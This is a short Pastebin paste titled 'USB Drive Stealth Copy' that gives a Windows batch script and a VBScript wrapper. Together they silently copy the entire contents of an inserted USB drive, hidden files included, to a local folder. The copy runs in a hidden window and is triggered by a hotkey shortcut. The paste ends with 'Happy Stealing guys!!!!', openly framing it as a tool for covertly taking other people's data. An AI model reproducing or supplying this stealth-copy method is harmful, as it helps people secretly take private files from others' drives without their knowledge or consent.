Advertisement
Najeebsk

USB Drive Stealth Copy

Jul 2nd, 2022
180
0
Never
Not a member of Pastebin yet? Sign Up, it unlocks many cool features!
text 0.83 KB | None | 0 0
  1. Below are the steps:If I Drive USB
  2.  
  3. 1. Create a file named "idrive.bat" and paste the below content in the file.
  4. @ECHO OFF
  5. XCOPY I: D:\Copy_of_I /E /H /I /Q /Y
  6. ATTRIB +I D:\Copy_of_I
  7. EXIT
  8.  
  9. Note: Please make sure that you modify the drive letters according to your system.
  10.  
  11. 2. Create another file named "idrive.vbs" and paste the below content in the file.
  12. Set WshShell=WScript.CreateObject("WScript.Shell")
  13. obj=WshShell.Run("idrive.bat",0)
  14. Set WshShell=Nothing
  15.  
  16. 3. Save both the files and keep them in the same directory.
  17.  
  18. 4. Create a shortcut for "idrive.vbs" file and assign a shortcut key to the file. For eg. CTRL+ALT+N
  19.  
  20. 5. Insert the pen drive or USB drive to your system.
  21.  
  22. 6. Go to desktop and press CTRL+ALT+N. The data will be copied from USB drive to the specified location in the background.
  23.  
  24. Happy Stealing guys!!!!
Advertisement
Add Comment
Please, Sign In to add comment
Advertisement